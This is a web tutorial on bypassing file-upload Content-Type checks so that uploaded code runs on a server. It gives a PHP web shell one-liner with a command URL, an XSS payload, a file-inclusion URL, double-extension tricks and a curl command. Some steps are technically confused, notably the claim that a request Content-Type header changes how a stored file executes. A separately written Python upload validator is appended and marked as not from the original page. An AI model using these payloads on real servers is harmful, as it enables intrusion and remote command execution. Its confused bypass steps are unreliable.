Bypass Text/Plain Content Type

TL;DR

Some servers incorrectly block files based on their Content-Type header (e.g., text/plain) even if the file content itself is executable code like PHP or JavaScript. This guide shows how to bypass this restriction by manipulating the request and server response.

Solution

  1. Understand the Problem: Servers sometimes rely too heavily on Content-Type headers instead of actually examining file content. If a server sees text/plain, it might refuse to execute the file, even if it’s valid PHP or JavaScript.
    • This is often a security measure gone wrong – it’s easy to circumvent and doesn’t reliably protect against malicious uploads.
  2. Attempt Direct Execution (First Try): Before trying anything complex, simply try accessing the uploaded file directly in your browser.
    • If this works, you’re lucky! The server might not be enforcing the Content-Type restriction as strictly.
  3. Manipulate the Request with a Different Extension: Try changing the file extension in the URL.
    • If your uploaded file is named shell.txt, try accessing it as shell.php or shell.js. The server might ignore the original extension and execute based on the new one.
    • Example: If you upload shell.txt containing PHP code, try
      http://example.com/uploads/shell.php
  4. Use a Different Content-Type Header (Client-Side): You can attempt to trick the server by sending a different Content-Type header with your request.
    • This is best done using tools like curl or browser developer tools.
    • Using curl:
      curl -H "Content-Type: application/php" http://example.com/uploads/shell.txt

      (Replace application/php with the appropriate MIME type for your file content, e.g., application/javascript).

  5. Exploit Server-Side Parsing Vulnerabilities: Some servers may have vulnerabilities in how they parse files.
    • PHP Code Injection (if the server parses PHP): If the server is configured to parse PHP code within HTML or other file types, you might be able to inject PHP code directly into your text/plain file. For example, if the server allows PHP tags in .html files, you could upload a file like:
      <?php system($_GET['cmd']); ?>

      and access it as
      http://example.com/uploads/shell.html?cmd=whoami
    • JavaScript Injection (if the server executes JavaScript): Similar to PHP, if the server allows JavaScript execution in HTML or other file types, you can inject JavaScript code.
      <script>alert('XSS');</script>
  6. File Inclusion Vulnerabilities (if applicable): If the server has a file inclusion vulnerability, you might be able to include your text/plain file as part of another script.
    • Example: If there’s a vulnerable parameter like file= in a URL:
      http://example.com/index.php?file=/uploads/shell.txt
  7. Double Extension Bypass (if the server only checks the last extension): Some servers only check the final file extension.
    • Upload a file named shell.txt.php or shell.php.txt. The server might execute it as PHP if it sees the .php extension at the end.
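
The weaknesses in steps 1, 3 and 7 share one root cause: the upload is judged by a client-supplied label or by only one of its extensions. As an added example (not code from the original page), this Python server-side check ignores the declared Content-Type, inspects every extension and the file bytes, and chooses its own storage name; the function name, the text-only allowlist and the sample uploads are assumptions constructed for illustration.

```python
import os
import re
import secrets

# Assumed policy for this example: a text-only upload feature.
ALLOWED_EXTENSIONS = {"txt", "csv", "log"}
# Extensions a web server may hand to an interpreter or render as active content.
ACTIVE_EXTENSIONS = {"php", "php3", "php5", "phtml", "phar", "js", "html", "htm", "shtml"}
# Markers matching the page's own payloads: PHP open tags and script tags.
ACTIVE_CONTENT = re.compile(rb"<\?(php|=)|<script\b", re.IGNORECASE)


def validate_upload(filename, declared_type, data):
    """Return (ok, reason, stored_name). declared_type is client-controlled
    and is deliberately never used to make the decision."""
    base = os.path.basename(filename.replace("\\", "/")).lower()
    parts = base.split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "missing name or extension", None
    extensions = parts[1:]
    # Check every extension, not only the last one, so that both
    # shell.php.txt and shell.txt.php are rejected.
    active = [e for e in extensions if e in ACTIVE_EXTENSIONS]
    if active:
        return False, "active extension: ." + active[0], None
    if extensions[-1] not in ALLOWED_EXTENSIONS:
        return False, "extension not allowed: ." + extensions[-1], None
    # Inspect the bytes themselves rather than trusting the label.
    if ACTIVE_CONTENT.search(data):
        return False, "active content in body", None
    # Store under a server-chosen name so the request path cannot pick the handler.
    stored = secrets.token_hex(16) + "." + extensions[-1]
    return True, "ok", stored


# Constructed sample uploads mirroring the cases listed on the page.
SAMPLES = [
    ("notes.txt", "text/plain", b"meeting notes\n"),
    ("shell.txt", "text/plain", b"<?php system($_GET['cmd']); ?>"),
    ("shell.txt.php", "text/plain", b"hello"),
    ("shell.php.txt", "text/plain", b"hello"),
    ("page.txt", "text/plain", b"<script>alert('XSS');</script>"),
]

if __name__ == "__main__":
    for name, ctype, body in SAMPLES:
        print(name, validate_upload(name, ctype, body)[:2])
```

Content checks like this are a second layer: the upload directory should also be served with script handlers disabled, so that a file that slips through is returned as data and never executed.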